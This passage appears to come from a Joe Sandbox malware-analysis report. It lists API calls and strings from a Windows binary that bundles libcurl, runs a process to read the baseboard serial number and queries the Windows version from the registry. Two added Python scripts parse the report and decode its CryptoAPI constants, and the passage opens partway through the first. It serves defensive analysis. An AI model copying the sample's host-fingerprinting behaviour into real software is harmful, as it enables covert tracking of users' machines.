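• API ID: ErrorFailureLastrecv
• String ID: 3'
Memory Dump Source
• API ID:
• String ID:
"""

# Only top-level "Api.Module" bullets are taken; "Part of subcall" lines describe callees.
API_RE = re.compile(r"^\s*•\s*(?P<name>[@\w]+)\.(?P<mod>\w+)")
REF_RE = re.compile(r"ref:\s*(?P<ref>[0-9A-Fa-f]+)")
STRING_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<s>.*)$")

# Assumed CRT groupings (editor's assumption about what the MSVC runtime calls internally).
CRT_LOCALE = {"GetLocaleInfoW", "EnumSystemLocalesW", "IsValidCodePage", "IsValidLocale",
              "GetACP", "GetOEMCP", "GetUserDefaultLCID", "GetLastError", "SetLastError",
              "_free", "_wcschr", "EnterCriticalSection"}      # setlocale / code-page init
CRT_FAILFAST = {"IsDebuggerPresent", "SetUnhandledExceptionFilter", "UnhandledExceptionFilter"}
CRT_EXIT = {"GetCurrentProcess", "TerminateProcess", "ExitProcess"}


def parse_entries(text: str) -> List[Dict]:
    """Split report text into entries; each has a ref (first API address), APIs and strings."""
    entries, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        # An entry starts at "APIs", or at "Memory Dump Source" when there was no APIs list.
        if s == "APIs" or (s == "Memory Dump Source" and (cur is None or cur["seen_dump"])):
            cur = {"ref": None, "apis": [], "strings": [], "seen_dump": False}
            entries.append(cur)
        if cur is None:
            continue
        if s == "Memory Dump Source":
            cur["seen_dump"] = True
        elif (m := API_RE.match(line)):
            cur["apis"].append({"name": m.group("name"), "module": m.group("mod")})
            r = REF_RE.search(line)
            if cur["ref"] is None and r:
                cur["ref"] = int(r.group("ref"), 16)
        elif (m := STRING_RE.match(line)) and m.group("s"):
            cur["strings"].extend(m.group("s").split("$"))   # Joe joins several strings with $
    return entries


def classify(entry: Dict) -> str:
    """Tag an entry; anything not starting with crt_/no_apis deserves a look."""
    if not entry["apis"]:
        return "no_apis"
    names = {a["name"] for a in entry["apis"]}
    mods = {a["module"] for a in entry["apis"]}
    real = {n for n in names if "_RTC_" not in n}          # drop debug run-time checks
    if "ADVAPI32" in mods and any(n.startswith("Crypt") for n in real):
        return "cryptoapi"
    if "WS2_32" in mods:
        return "winsock"
    if not real:
        return "rtc_only"   # only RTC checks resolved; judge it by its strings
    if real <= CRT_FAILFAST:
        return "crt_securityfailure"
    if real <= CRT_EXIT:
        return "crt_exit"
    if real <= CRT_LOCALE:
        return "crt_locale"
    return "other"


def is_debug_build(entries: List[Dict]) -> bool:
    """Any _RTC_ reference means the binary was built with the debug CRT's run-time checks."""
    return any("_RTC_" in a["name"] for e in entries for a in e["apis"])


def interesting(entries: List[Dict]) -> List[Dict]:
    """Entries left after CRT noise and empty entries are dropped."""
    return [e for e in entries if not classify(e).startswith(("crt_", "no_apis"))]


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE_REPORT)
    print("debug CRT build:", is_debug_build(parsed))
    for e in parsed:
        ref = f"{e['ref']:08X}" if e["ref"] is not None else "--------"
        print(ref, classify(e), e["strings"])
```

Run against the whole "APIs" section of a report rather than this excerpt; the payoff is the short list that `interesting()` returns, which is where the analyst's time should go.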
    APIs
    • CryptHashData.ADVAPI32(?,?,006BA29D,00000000,?,?,006BA29D,?,?,00000000,?,?,006B35B3,?,00000000,?), ref: 006BA377
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CryptDataFailureHash
    • String ID:
    • API String ID: 3512970722-0
    • Opcode ID: 658a094db32bd8dc89f931d88c3fbd0d53856fa341ba52a94d0293aad097886a
    • Instruction ID: 9fc4cc1d78c72e16fc162204d46513fb8c3edad450169fbfb5d8a7b0b441d3ec
    • Opcode Fuzzy Hash: 658a094db32bd8dc89f931d88c3fbd0d53856fa341ba52a94d0293aad097886a
    • Instruction Fuzzy Hash: 0DD01272100218ABC744EB9CEC82E9A779DAB0A220F454114F91C9B241C671D98087E5
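The ADVAPI32 entries above (CryptAcquireContextA and CryptCreateHash at 006BA318 / 006BA341, CryptHashData at 006BA377, the two CryptGetHashParam calls at 006BA3C6 / 006BA3EE, and the CryptGenRandom routine at 00682FAA) only become readable once the numeric arguments are decoded against wincrypt.h: dwProvType 00000001 is PROV_RSA_FULL, dwFlags F0000000 is CRYPT_VERIFYCONTEXT (F0000040 adds CRYPT_SILENT), Algid 00008002 is CALG_MD4 rather than MD5, and dwParam 00000002 is HP_HASHVAL, with the first call a NULL-buffer size query and the second fetching a 16-byte digest, which is the MD4 output length. The script below is an added example, not part of the Joe Sandbox report or of the sample; it parses the report's own API lines (copied above as constructed input) and decodes them. It assumes the value the plugin lists in the pdwDataLen slot is the recovered length and treats '?' as unresolved; what the hash or the random bytes are used for is not something these lines tell you.

```python
"""Decode the ADVAPI32 CryptoAPI calls listed in the report's 'APIs' lines.
Added example, not part of the Joe Sandbox report. Constants are wincrypt.h
values; '?' in a report line is an argument the IDA plugin could not resolve."""
import re
from typing import Dict, List, Optional

# Constructed sample input: the hash and RNG call lines copied from the entries above.
SAMPLE_LINES = [
    "CryptAcquireContextA.ADVAPI32(006BA280,00000000,00000000,00000001,F0000000,?,?,006BA280,?,006B35B3,?,00000000,?), ref: 006BA318",
    "CryptCreateHash.ADVAPI32(?,00008002,00000000,00000000,006BA27C,?,?,006BA280,?,006B35B3,?,00000000,?), ref: 006BA341",
    "CryptHashData.ADVAPI32(?,?,006BA29D,00000000,?,?,006BA29D,?,?,00000000,?,?,006B35B3,?,00000000,?), ref: 006BA377",
    "CryptGetHashParam.ADVAPI32(?,00000002,00000000,00000000,00000000), ref: 006BA3C6",
    "CryptGetHashParam.ADVAPI32(?,00000002,00000010,00000010,00000000), ref: 006BA3EE",
    "CryptDestroyHash.ADVAPI32(?), ref: 006BA40D",
    "CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 006BA42C",
    "CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000040), ref: 00682F84",
    "CryptGenRandom.ADVAPI32(00000000,?,CCCCCCCC), ref: 00682FAA",
    "CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00682FC3",
]

# wincrypt.h constants (SDK values, not something the report states).
PROV_TYPES = {1: "PROV_RSA_FULL", 12: "PROV_RSA_SCHANNEL", 24: "PROV_RSA_AES"}
ACQUIRE_FLAGS = {0xF0000000: "CRYPT_VERIFYCONTEXT", 0x8: "CRYPT_NEWKEYSET",
                 0x10: "CRYPT_DELETEKEYSET", 0x20: "CRYPT_MACHINE_KEYSET", 0x40: "CRYPT_SILENT"}
ALG_IDS = {0x8001: "CALG_MD2", 0x8002: "CALG_MD4", 0x8003: "CALG_MD5", 0x8004: "CALG_SHA1",
           0x8009: "CALG_HMAC", 0x800C: "CALG_SHA_256", 0x800D: "CALG_SHA_384", 0x800E: "CALG_SHA_512"}
HASH_PARAMS = {1: "HP_ALGID", 2: "HP_HASHVAL", 4: "HP_HASHSIZE"}
DIGEST_LEN = {"CALG_MD2": 16, "CALG_MD4": 16, "CALG_MD5": 16, "CALG_SHA1": 20,
              "CALG_SHA_256": 32, "CALG_SHA_384": 48, "CALG_SHA_512": 64}

LINE_RE = re.compile(r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


def parse_call(line: str) -> Optional[Dict]:
    """Split one 'Api.Module(args), ref: addr' line; '?' becomes None, hex becomes int."""
    m = LINE_RE.search(line)
    if not m:
        return None
    args = []
    for tok in m.group("args").split(","):
        tok = tok.strip()
        # The plugin prints small negatives such as -00000050; keep them as 32-bit values.
        args.append(None if tok in ("", "?") else int(tok, 16) & 0xFFFFFFFF)
    return {"api": m.group("api"), "module": m.group("mod"),
            "args": args, "ref": int(m.group("ref"), 16)}


def decode_flags(value: int, table: Dict[int, str]) -> List[str]:
    """Name every flag whose bits are all set; any leftover bits are reported as hex."""
    names, covered = [], 0
    for bit, name in table.items():
        if (value & bit) == bit:
            names.append(name)
            covered |= bit
    rest = value & ~covered & 0xFFFFFFFF
    if rest:
        names.append(f"0x{rest:X}")
    return names


def describe_call(call: Dict) -> str:
    """One readable line per call, with the numeric arguments named."""
    a, api = call["args"], call["api"]
    if api.startswith("CryptAcquireContext") and len(a) >= 5 and a[4] is not None:
        prov = PROV_TYPES.get(a[3], f"provtype {a[3]}")
        return f"{api}: {prov}, flags {'|'.join(decode_flags(a[4], ACQUIRE_FLAGS))}"
    if api == "CryptCreateHash" and len(a) >= 2 and a[1] is not None:
        alg = ALG_IDS.get(a[1], f"ALG_ID 0x{a[1]:X}")
        return f"{api}: {alg}"
    if api == "CryptGetHashParam" and len(a) >= 4 and a[1] is not None:
        param = HASH_PARAMS.get(a[1], f"dwParam {a[1]}")
        mode = "size query (pbData NULL)" if a[2] == 0 else f"read {a[3]} bytes"
        return f"{api}: {param}, {mode}"
    return f"{api}: args {a}"


def analyze_sequence(lines: List[str]) -> Dict:
    """Summarise provider, hash algorithm and digest size implied by a call listing."""
    s = {"providers": [], "hash_alg": None, "expected_digest_len": None,
         "reported_digest_len": None, "rng_calls": 0, "ephemeral_only": True}
    for call in filter(None, map(parse_call, lines)):
        a, api = call["args"], call["api"]
        if api.startswith("CryptAcquireContext") and len(a) >= 5 and a[4] is not None:
            flags = decode_flags(a[4], ACQUIRE_FLAGS)
            s["providers"].append((PROV_TYPES.get(a[3], f"provtype {a[3]}"), flags))
            # Without CRYPT_VERIFYCONTEXT the call opens or creates a persistent key container.
            if "CRYPT_VERIFYCONTEXT" not in flags:
                s["ephemeral_only"] = False
        elif api == "CryptCreateHash" and len(a) >= 2 and a[1] is not None:
            s["hash_alg"] = ALG_IDS.get(a[1], f"ALG_ID 0x{a[1]:X}")
            s["expected_digest_len"] = DIGEST_LEN.get(s["hash_alg"])
        elif api == "CryptGetHashParam" and len(a) >= 4 and a[1] == 2 and a[2] not in (None, 0):
            # Assumption: the value listed in the pdwDataLen slot is the recovered length.
            s["reported_digest_len"] = a[3]
        elif api == "CryptGenRandom":
            s["rng_calls"] += 1
    s["digest_len_consistent"] = (s["expected_digest_len"] is not None
                                  and s["expected_digest_len"] == s["reported_digest_len"])
    return s


if __name__ == "__main__":
    for call in filter(None, map(parse_call, SAMPLE_LINES)):
        print(f"{call['ref']:08X}  {describe_call(call)}")
    print(analyze_sequence(SAMPLE_LINES))
```

The digest-length cross-check is the useful part: an ALG_ID decoded from a possibly wrong stack slot is only trusted when the buffer size the second CryptGetHashParam asks for matches that algorithm's output, which here it does (16 bytes for CALG_MD4).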
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 46f999861097c4f13e540b774a397c3fcbd32cb031a13501e815355824a9751f
    • Instruction ID: cdcc90aa2c0244e8d72926533c0ddecb9ecfbf5cdc0fd07b8ca1182373d6a04c
    • Opcode Fuzzy Hash: 46f999861097c4f13e540b774a397c3fcbd32cb031a13501e815355824a9751f
    • Instruction Fuzzy Hash: EEF03972E11224EBCB26DB8CC805A9973A9EB45B65F1240AAE541EB351C7B4DE40C7C4
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: da9e6bca82774ea64ae42dd25e6b3acd87546c7071bc047563dc2105fc4fb8b2
    • Instruction ID: 415867bf73bf9bee83a49cb42c31520dae8a4c451d4d3a94038a2e2bc80555dc
    • Opcode Fuzzy Hash: da9e6bca82774ea64ae42dd25e6b3acd87546c7071bc047563dc2105fc4fb8b2
    • Instruction Fuzzy Hash: 69E04632911228EBCB15EB888A0498AB2EDEB45B40B16009AB501D3240C270DE00CBD4
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 00670F5B
    • ___from_strstr_to_strchr.LIBCMT ref: 00670F78
    Similarity
    • API ID: ___from_strstr_to_strchr
    • String ID: %s$Authorization:$Authorization:$Connection:$Connection:$Content-Length:$Content-Length:$Content-Type:$Content-Type:$Content-Type:$Content-Type:$Cookie:$Cookie:$Host:$Host:$Transfer-Encoding:$Transfer-Encoding:
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 00687BE1
    • ___from_strstr_to_strchr.LIBCMT ref: 00687C01
    • ___from_strstr_to_strchr.LIBCMT ref: 00687C27
    • ___from_strstr_to_strchr.LIBCMT ref: 00687C4D
    • ___from_strstr_to_strchr.LIBCMT ref: 00687DA0
    • ___from_strstr_to_strchr.LIBCMT ref: 00687DC0
    • ___from_strstr_to_strchr.LIBCMT ref: 00687DE6
    Similarity
    • API ID: ___from_strstr_to_strchr
    • String ID: /D:$/DEFINE:$/FIND:$/LOOKUP:$/M:$/MATCH:$0!p$8!p$CLIENT libcurl 7.67.1-DEV%sQUIT$CLIENT libcurl 7.67.1-DEVDEFINE %s %sQUIT$CLIENT libcurl 7.67.1-DEVMATCH %s %s %sQUIT$Failed sending DICT request$Failed sending DICT request$Failed sending DICT request$lookup word is missing$lookup word is missing
    Similarity
    • API ID: _memcmp$_strlen
    • String ID: CAPABILITY$EXAMINE$EXPUNGE$FETCH$FETCH$LIST$LSUB$NOOP$PREAUTH$SEARCH$SEARCH$SELECT$STORE$UID$Unexpected continuation response
    Similarity
    • API ID: ErrorLast_strlensend$CheckStackVars@8
    • String ID: %127[^,],%127s$%c%c$%c%c%c%c$%c%c%c%c%s%c%c$%c%c%c%c%s%c%c$%c%s%c%s$'$Sending data failed (%d)$Sending data failed (%d)$Sending data failed (%d)
    APIs
    • _strlen.LIBCMT ref: 0068CEE2
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0068D0AD
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: %s (%d)$%s (%d)$%s (%d) %s (%d)$%s (%ld)$%s (%ld)$Malformed ACK packet, rejecting$blksize$blksize is larger than max supported$blksize is smaller than min supported$blksize parsed from OACK$got option=(%s) value=(%s)$invalid blocksize value in OACK packet$invalid tsize -:%s:- value in OACK packet$requested$server requested blksize larger than allocated$tsize$tsize parsed from OACK
    APIs
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00678764
    • __allrem.LIBCMT ref: 006787A3
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006787B1
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006787C7
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00678806
    • __allrem.LIBCMT ref: 00678842
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00678850
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00678866
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006788A5
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006788E1
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0067890C
    Similarity
    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem
    • String ID: %2I64d.%0I64dG$%2I64d.%0I64dM$%4I64dG$%4I64dM$%4I64dP$%4I64dT$%4I64dk$%5I64d
    APIs
      • Part of subcall function 006B1A90: @_RTC_CheckStackVars@8.LIBCMT ref: 006B1CA7
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006B332C
    Similarity
    • API ID: CheckStackVars@8
    • String ID: $ RSA Public Key (%lu bits)$%lu$RSA Public Key$dh(g)$dh(p)$dh(pub_key)$dhpublicnumber$dsa$dsa(g)$dsa(p)$dsa(pub_key)$dsa(q)$rsa(e)$rsa(n)$rsaEncryption
    APIs
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00678EB5
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00678FB5
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00679007
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0067901F
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00679082
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006790F2
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00679144
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0067915C
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006791BF
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006793B9
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006793C8
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006793FE
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00679549
    Strings
    • ** Resuming transfer from byte position %I64d, xrefs: 00678F0A
    • %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed, xrefs: 00678F21
    • %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s, xrefs: 00679516
    Similarity
    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$CheckStackVars@8
    • String ID: %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$** Resuming transfer from byte position %I64d
    APIs
    • CreatePipe.KERNEL32 ref: 00631338
    • GetStartupInfoW.KERNEL32(00000044), ref: 0063134D
    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,00000044,00000000), ref: 00631398
    • WaitForSingleObject.KERNEL32(00000000,00000BB8), ref: 006313AD
    • ReadFile.KERNEL32(?,?,00002710,00000000,00000000), ref: 006313CE
    • CloseHandle.KERNEL32(?), ref: 00631422
    • CloseHandle.KERNEL32(?), ref: 0063142A
    • CloseHandle.KERNEL32(00000000), ref: 00631432
    • CloseHandle.KERNEL32(00000000), ref: 0063143A
    • CloseHandle.KERNEL32(?), ref: 006315E6
    • CloseHandle.KERNEL32(?), ref: 006315EE
    • CloseHandle.KERNEL32(?), ref: 006315F6
    • CloseHandle.KERNEL32(?), ref: 006315FE
    Similarity
    • API ID: CloseHandle$Create$FileInfoObjectPipeProcessReadSingleStartupWait
    • String ID: D$SerialNumber$eBoard get SerialNumber
    APIs
    • GetLastError.KERNEL32(?), ref: 006A5AC9
    • _strncpy.LIBCMT ref: 006A5F72
    • FormatMessageA.KERNEL32(00001200,00000000,80090326,00000000,?,000000FF,00000000), ref: 006A6010
    • _strrchr.LIBCMT ref: 006A6072
    • _strrchr.LIBCMT ref: 006A60AE
    • _strncpy.LIBCMT ref: 006A612A
    • GetLastError.KERNEL32 ref: 006A6153
    • SetLastError.KERNEL32(80090326), ref: 006A616B
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006A6185
    Strings
    • pgp, xrefs: 006A5F23
    • P, xrefs: 006A5FD8
    • SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log., xrefs: 006A5F8C
    • I, xrefs: 006A5B96
    • 4`p, xrefs: 006A5F6A, 006A5F6D
    • %s - %s, xrefs: 006A6104
    • %s (0x%08X), xrefs: 006A5FB7
    Similarity
    • API ID: ErrorLast$_strncpy_strrchr$CheckFormatMessageStackVars@8
    • String ID: %s (0x%08X)$%s - %s$4`p$I$P$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$pgp
    Similarity
    • API ID: _strlen$Stack$CheckFailureVars@8
    • String ID: 0$curl$curl$curl$i386-pc-win32$i386-pc-win32$i386-pc-win32
    APIs
    • _strlen.LIBCMT ref: 0066EB8A
    • ___from_strstr_to_strchr.LIBCMT ref: 0066EC20
    • _strlen.LIBCMT ref: 0066EF2F
      • Part of subcall function 006BF68C: ___report_securityfailure.LIBCMT ref: 006BF691
    • ___from_strstr_to_strchr.LIBCMT ref: 0066ED3F
    • _strlen.LIBCMT ref: 0066ED5D
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0066F0F2
    Strings
    • Resolve address '%s' found illegal!, xrefs: 0066EE65
    • Added %s:%d:%s to DNS cache, xrefs: 0066F071
    • @, xrefs: 0066EDE4
    • Couldn't parse CURLOPT_RESOLVE removal entry '%s'!, xrefs: 0066EB4E
    • RESOLVE %s:%d is - old addresses discarded!, xrefs: 0066EF96
    • @, xrefs: 0066EE1B
    • Couldn't parse CURLOPT_RESOLVE entry '%s'!, xrefs: 0066EEE1
    • RESOLVE %s:%d is wildcard, enabling wildcard checks, xrefs: 0066F0B9
    • %255[^:]:%d, xrefs: 0066EB2D
    Similarity
    • API ID: _strlen$___from_strstr_to_strchr$CheckStackVars@8___report_securityfailure
    • String ID: %255[^:]:%d$@$@$Added %s:%d:%s to DNS cache$Couldn't parse CURLOPT_RESOLVE entry '%s'!$Couldn't parse CURLOPT_RESOLVE removal entry '%s'!$RESOLVE %s:%d is - old addresses discarded!$RESOLVE %s:%d is wildcard, enabling wildcard checks$Resolve address '%s' found illegal!
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0066B918
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661F74
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661FCC
      • Part of subcall function 00661F00: @_RTC_CheckStackVars@8.LIBCMT ref: 00661FFA
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    Strings
    • %zx%s, xrefs: 0066B7A2
    • Signaling end of chunked upload after trailers., xrefs: 0066B8A8
    • Read callback asked for PAUSE when not supported!, xrefs: 0066B68A
    • Moving trailers state machine from initialized to sending., xrefs: 0066B454
    • operation aborted by trailing headers callback, xrefs: 0066B51D
    • operation aborted by callback, xrefs: 0066B63D
    • *, xrefs: 0066B537
    • Signaling end of chunked upload via terminating chunk., xrefs: 0066B8D9
    • Successfully compiled trailers., xrefs: 0066B56A
    • Unable to allocate trailing headers buffer !, xrefs: 0066B48C
    • read function returned funny value, xrefs: 0066B700
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: %zx%s$*$Moving trailers state machine from initialized to sending.$Read callback asked for PAUSE when not supported!$Signaling end of chunked upload after trailers.$Signaling end of chunked upload via terminating chunk.$Successfully compiled trailers.$Unable to allocate trailing headers buffer !$operation aborted by callback$operation aborted by trailing headers callback$read function returned funny value
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00658A4B
    Similarity
    • API ID: CheckStackVars@8
    • String ID: public key hash: sha256//%s$;sha256//$Z$sha256//$sha256//
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0068D7A1
    Similarity
    • API ID: CheckStackVars@8
    • String ID: %I64d$%s%c%s%c$TFTP buffer too small for options$TFTP file name too long$blksize$timeout$tsize
    Similarity
    • API ID: _strncpy$CheckStackVars@8
    • String ID: %127[^= ]%*[ =]%255s$%hu%*[xX]%hu$1$BINARY$NEW_ENV$Syntax error in telnet option: %s$Syntax error in telnet option: %s$TTYPE$USER,%s$Unknown telnet option %s$XDISPLOC
    APIs
    • GetModuleHandleA.KERNEL32(kernel32), ref: 006668C9
    • GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 006668F1
    • _strpbrk.LIBCMT ref: 0066690A
    Similarity
    • API ID: AddressHandleModuleProc_strpbrk
    • String ID: AddDllDirectory$LoadLibraryExA$kernel32
    APIs
    • GetNativeSystemInfo.KERNEL32(?), ref: 006420B3
    • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?, 64bit), ref: 00642106
    • RegQueryValueExW.ADVAPI32(?,ProductName,00000000,00000001,00000000,00000032), ref: 00642121
    • RegQueryValueExW.ADVAPI32(?,EditionID,00000000,00000001,?,00000032), ref: 00642140
    • RegCloseKey.ADVAPI32(?), ref: 0064216B
    • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,?,00000000,00000000), ref: 006421BB
    • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,?,00000000,00000000,00000000,00000001), ref: 00642241
    Similarity
    • API ID: ByteCharMultiQueryValueWide$CloseInfoNativeOpenSystem
    • String ID: 32bit$ 64bit$2$EditionID$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
    Similarity
    • API ID: _free$Info
    APIs
    • select.WS2_32(FFFFFFFE,00000000,00000000,00000000,00000000), ref: 00667177
    • WSAGetLastError.WS2_32 ref: 0066719A
    • __WSAFDIsSet.WS2_32(000000FF,00000000), ref: 006672A3
    • __WSAFDIsSet.WS2_32(000000FF,00000000), ref: 006672C6
    • __WSAFDIsSet.WS2_32(000000FF,00000000), ref: 006672EF
    • __WSAFDIsSet.WS2_32(000000FF,00000000), ref: 00667312
    • __WSAFDIsSet.WS2_32(000000FF,00000000), ref: 0066733B
    • __WSAFDIsSet.WS2_32(000000FF,00000000), ref: 0066735E
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00667386
    Similarity
    • API ID: CheckErrorLastStackVars@8select
    • String ID: @$@$@
    APIs
      • Part of subcall function 0063EA50: std::locale::_Init.LIBCPMT ref: 0063EADB
      • Part of subcall function 0063E530: std::locale::_Init.LIBCPMT ref: 0063E572
      • Part of subcall function 00633B90: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00633BD1
      • Part of subcall function 00633B90: _wcsrchr.LIBVCRUNTIME ref: 00633BE0
    • __Xtime_get_ticks.LIBCPMT ref: 0063CC35
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0063CC43
    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0063CE57
    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0063CF01
    Similarity
    • API ID: InitIos_base_dtorstd::ios_base::_std::locale::_$FileModuleNameUnothrow_t@std@@@Xtime_get_ticks__ehfuncinfo$??2@_wcsrchr
    • String ID: %d-%02d-%02d %02d:%02d:%02d$X$`$time.txt$wo$wo$wo$wo
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00673B05
      • Part of subcall function 0066A280: _strlen.LIBCMT ref: 0066A29F
      • Part of subcall function 00670630: _strlen.LIBCMT ref: 0067067A
    Similarity
    • API ID: _strlen$CheckStackVars@8
    • String ID: %x$0$0$100-continue$Content-Length$Content-Length: %I64d$Content-Type$Content-Type: application/x-www-form-urlencoded$Expect$Expect:$Failed sending HTTP POST request
    APIs
      • Part of subcall function 006A1600: @_RTC_CheckStackVars@8.LIBCMT ref: 006A1FC7
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0065DF62
      • Part of subcall function 006A0D40: @_RTC_CheckStackVars@8.LIBCMT ref: 006A1566
    Similarity
    • API ID: CheckStackVars@8
    • String ID: Unsupported proxy '%s', libcurl is built without the HTTPS-proxy support.$Unsupported proxy scheme for '%s'$Unsupported proxy syntax in '%s'$http$https$socks$socks4$socks4a$socks5$socks5h
    APIs
